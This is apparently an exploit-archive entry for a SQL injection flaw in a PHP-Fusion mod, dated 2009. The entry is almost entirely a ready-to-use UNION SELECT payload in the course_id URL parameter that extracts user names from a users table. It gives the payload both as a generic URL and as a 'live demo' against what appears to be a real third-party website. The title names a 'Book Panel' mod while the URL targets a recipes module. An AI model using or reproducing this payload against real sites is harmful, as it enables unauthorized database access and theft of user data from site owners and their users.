id: 4925
date: 03/10/2009
title: PHP-Fusion Mod Book Panel (course_id) SQL Injection Vulnerability
author: SuB-ZeRo
cves: 

=================================================================
PHP-Fusion Mod Book Panel (course_id) SQL Injection Vulnerability
=================================================================


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Exploit:

http://site.com/[path]/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7+from+security_users--

   live demo :
http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7+from+security_users--




#  0day.today [2023-03-26]  #